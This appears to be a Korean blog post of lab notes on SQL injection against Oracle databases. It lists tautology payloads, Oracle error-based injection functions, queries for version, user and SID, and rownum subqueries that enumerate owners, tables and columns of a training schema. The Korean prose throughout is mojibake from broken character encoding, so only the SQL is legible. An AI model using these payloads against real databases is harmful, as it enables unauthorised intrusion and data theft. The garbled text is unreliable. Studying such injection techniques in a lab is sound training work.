์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

ORACLE INJECTION

  • -
๋ฐ˜์‘ํ˜•

' or 1=1 --

' and 1=1 --    : ์ถœ๋ ฅ o 

> SELECT * FROM tb_board WHERE title like '%' and 1=1 -- %'

' and 1=2 --    : ์ถœ๋ ฅ x

1. ์—๋Ÿฌ ์œ ๋ฌด ๋ถ„์„ / ์ทจ์•ฝ์  ์ง„๋‹จ / ๊ณต๊ฒฉ ์กฐ๊ฑด๋ฌธ ์™„์„ฑ

' or 1=1 --

' or 1=2 --

>> ๊ฒฐ๊ณผ๊ฐ€ ๋™์ผํ•  ๋•Œ ์กฐ๊ฑด๋ฌธ ๊ตฌ๋ฌธ์ด ์•„๋‹ˆ๋‹ค

' or 1=1 and 1=1 --

' or 1=2 and 1=2 -- 

 

2. ํ™˜๊ฒฝ ๋ถ„์„

3. ๊ณต๊ฒฉ ์„ ํƒ

4. ๋ฉ”ํƒ€๋ฐ์ดํ„ฐ ์กฐํšŒ

5. 

 

 

rownum ๊ฐ€์ƒ ์ปฌ๋Ÿผ

# mysql : #,-- (์ฃผ์„)
# oracle: --(์ฃผ์„)
SELECT username FROM all_users; > ์œ ์ €์ด๋ฆ„ ์ •์ƒ์ถœ๋ ฅ
SELECT rownum,username FROM all_users >> ๋ฒˆํ˜ธ, ์œ ์ €์ด๋ฆ„์ด ์ •์ƒ ์ถœ๋ ฅ
SELECT rownum, username FROM all_users WHERE rownum=1; >> 1๋ฒˆ ์œ ์ € ์ด๋ฆ„ ์ •์ƒ ์ถœ๋ ฅ

 

rownum ์‚ฌ์šฉ์‹œ ์ฃผ์˜ ์‚ฌํ•ญ > rownum์€ ๊ธฐ๋ณธ๊ฐ’์ด 1๋กœ ์„ค์ •์ด ๋˜์–ด์žˆ๋‹ค.

SELECT username FROM all_users WHERE rownum=1; > 1๋ฒˆ ์œ ์ € ์ •์ƒ ์ถœ๋ ฅ
SELECT username FROM all_users WHERE rownum=2; > 2๋ฒˆ ์œ ์ € ์ถœ๋ ฅ ๋ถˆ๊ฐ€

rownum์€ ๊ธฐ๋ณธ๊ฐ’์ด 1์ด๊ธฐ ๋•Œ๋ฌธ์— ์•„๋ž˜ ๊ตฌ๋ฌธ๊ณผ ๊ฐ™๋‹ค

SELECT username FROM all_users WHERE 1=2; >> ๊ทธ๋ ‡๊ธฐ์— ์ถœ๋ ฅ ๋ถˆ๊ฐ€

 

SELECT username FROM all_users WHERE rownum!=3;
SELECT username FROM all_users WHERE rownum<3;

> ์ถœ๋ ฅ ๊ฐ€๋Šฅํ•˜์ง€๋งŒ 2๋ฒˆ๊นŒ์ง€๋งŒ ์ถœ๋ ฅ

SELECT rownum r , username FROM all_users WHERE r=3;

# rounum์„ r์ด๋ผ๊ณ  ์นญํ•œ๋‹ค

SELECT ์ ˆ์ด ์‹คํ–‰ ๋˜๊ธฐ ์ „์ด๊ธฐ ๋•Œ๋ฌธ์— ์˜ค๋ฅ˜

SELECT * FROM (SELECT rownum r,username FROM all_users) WHERE r=3;

3๋ฒˆ ํ•˜๋‚˜๋งŒ ์ถœ๋ ฅํ•˜๊ธฐ ์™„๋ฃŒ

ORACLE์˜ ๋ฉ”ํƒ€ ๋ฐ์ดํ„ฐ ์กฐํšŒ
  MYSQL  ORACLE
๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค ์ด๋ฆ„ information_schema.schemata User
ํ…Œ์ด๋ธ” ์ด๋ฆ„ Sinformation_schema.tables User_tables
์ปฌ๋Ÿผ ์ด๋ฆ„ information_schema.columns User_tab_columns

 

ORACLE 3๊ฐ€์ง€ ๋ฐ์ดํ„ฐ ๋ถ„๋ฅ˜
DBA_ ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค ๊ด€๋ฆฌ์ž
ALL_ ํ˜„์žฌ ๋กœ๊ทธ์ธํ•œ ์‚ฌ์šฉ์ž๊ฐ€ ์ ‘๊ทผ ๊ฐ€๋Šฅํ•œ ๋ชจ๋“  ํ…Œ์ด๋ธ”๊ณผ ์ปฌ๋Ÿผ ์ •๋ณด
USER_ ํ˜„์žฌ ๋กœ๊ทธ์ธํ•œ ์‚ฌ์šฉ์ž๊ฐ€ ์ƒ์„ฑ/์†Œ์œ ํ•œ ํ…Œ์ด๋ธ”๊ณผ ์ปฌ๋Ÿผ ์ •๋ณด

SELECT DISTINCT owner FROM all_tables;	# ๋ชจ๋“  ํ…Œ์ด๋ธ”์˜ owner๋“ค์„ ์ค‘๋ณต ์ œ๊ฑฐ ํ›„ ๋ณด์—ฌ์ค€๋‹ค

SELECT DISTINCT owner FROM all_tab_columns;		# ๋ชจ๋“  ์ปฌ๋Ÿผ๋“ค์˜ owner์„ ์ค‘๋ณต ์ œ๊ฑฐ ํ›„ ๋ณด์—ฌ์ค€๋‹ค
SELECT DISTINCT * FROM all_tables WHERE owner='C##KITRI';
# 'C##KITRI'์œ ์ €๊ฐ€ ๊ฐ€์ง„ ํ…Œ์ด๋ธ” ๋ชฉ๋ก์„ ์กฐํšŒ
# owner๋’ค์˜ ์‚ฌ์šฉ์ž ์ด๋ฆ„์€ ๋ฌด์กฐ๊ฑด ๋Œ€๋ฌธ์ž์—ฌ์•ผ ํ•œ๋‹ค
# C##KITRI ์œ ์ €๊ฐ€ ๊ฐ€์ง„ MEMBERS ํ…Œ์ด๋ธ”์—์„œ ์ปฌ๋Ÿผ ์ด๋ฆ„์„ ์กฐํšŒํ•˜์‹œ์˜ค
SELECT column_name FROM all_tab_columns WHERE owner='C##KITRI' and table_name='MEMBERS';

๋ฉ”ํƒ€ ๋ฐ์ดํ„ฐ ๋ชฉ๋กํ™”

1. ํ˜„์žฌ ์‚ฌ์šฉ์ž(์œ ์ €)๋ฅผ ์ฐพ๋Š”๋‹ค.

2. ํ˜„์žฌ ์‚ฌ์šฉ์ž๊ฐ€ ๊ถŒํ•œ์„ ๊ฐ€์ง€๊ณ  ์กฐํšŒํ•  ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“  ํ…Œ์ด๋ธ”์˜ ๋ชฉ๋ก์„ ๋ณธ๋‹ค

ex) SELECT table_name FROM ALL_TABLES WHERE owner='C##KITRI'

3. ํ˜„์žฌ ์‚ฌ์šฉ์ž๊ฐ€ ๊ถŒํ•œ์„ ๊ฐ€์ง€๊ณ  ์กฐํšŒํ•  ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“  ์ปฌ๋Ÿผ์˜ ๋ชฉ๋ก์„ ๋ณธ๋‹ค.

ex) SELECT column_name FROM ALL_TAB_COLUMNS WHERE owner='C##KITRI' AND table_name='MEMBERS'

ORACLE
ALL
ALL_tables
ALL_tab_columns

 

ORACLE์—์„œ ErrorBased ๊ณต๊ฒฉ

ORDSYS.ORD_DICOM.GETMAPPINGXPATH (๊ณต๊ฒฉ๊ตฌ๋ฌธ)

CTXSYS.DRITHSX.SN(1,๊ณต๊ฒฉ๊ตฌ๋ฌธ)

CTXSYS.CTX_QUERY.CHK_XPATH(๊ณต๊ฒฉ๊ตฌ๋ฌธ,1)

 

# 3๊ฐ€์ง€ ๊ธฐ๋ณธ ์ •๋ณด
SELECT banner FROM v$version WHERE rownum=1;	# ๋ฒ„์ „
SELECT user FROM dual;		# ์‚ฌ์šฉ์ž
SELECT global_name FROM global_name;		# SID

๋ฉ”ํƒ€ ๋ฐ์ดํ„ฐ ๋ชฉ๋กํ™”

์ˆœ์ฐจ์  ์ ‘๊ทผ์˜ ์ˆœ์„œ

1. ์œ ์ €๋ช… ์กฐํšŒ

2. ํ…Œ์ด๋ธ” ์กฐํšŒ

3. ์ปฌ๋Ÿผ ์กฐํšŒ

 

1. ์ ‘๊ทผ ๊ฐ€๋Šฅํ•œ ์‚ฌ์šฉ์ž๋ช…(owner)์ด ํ•„์š”

SELECT DISTINCT owner FROM all_tables;


์‚ฌ์šฉ์ž ๋ชฉ๋กํ™”

# ์‹คํ–‰ ์˜ค๋ฅ˜ // ์ด์œ  : rownum๊ณผ DISTINCT๋Š” ํ•จ๊ป˜ ์‚ฌ์šฉํ•  ์ˆ˜ ์—†๋‹ค.
SELECT owner FROM (SELECT rownum r, DISTINCT owner FROM all_tables) WHERE r=1;

# ํ•ด๊ฒฐ์ฑ… : ์ค‘๋ณต ์ œ๊ฑฐ๋ฅผ ๋จผ์ € ํ•˜๊ณ  rownum์œผ๋กœ ์ˆœ์„œ๋ฅผ ๋ถ™์ธ๋‹ค.
SELECT owner FROM (SELECT rownum r, owner FROM(SELECT DISTINCT owner FROM all_tables)) WHERE r=1;

1. SYS   2. XDB   3.SYSTEM   4.CTXSYS   5.MDSYS   6.C##KITRI


ORACLE์˜ TABLE ๋ชฉ๋กํ™”
# all_tables์— ์žˆ๋Š” owner๊ฐ€ C##KITRI์ธ table_name์— ์ˆซ์ž๋ฅผ ๋งค๊ธด๋‹ค
SELECT table_name FROM (SELECT rownum r, table_name FROM all_tables WHERE owner='C##KITRI') WHERE r=1;

# column ์ด๋ฆ„ ๋ชฉ๋กํ™” ํ•˜๊ธฐ
SELECT column_name FROM ( SELECT rownum r, column_name FROM all_tab_columns WHERE owner='C##KITRI' and table_name='MEMBERS') WHERE r=1;

๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

ORACLE Union Based  (0) 2022.07.06
Oracle database ๊ณต๊ฒฉ ์‹ค์Šต  (0) 2022.07.05
Blind Injection -2  (0) 2022.07.04
Blind Injection -1  (0) 2022.07.01
oracle ํ™˜๊ฒฝ ์„ค์ •  (0) 2022.06.30
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.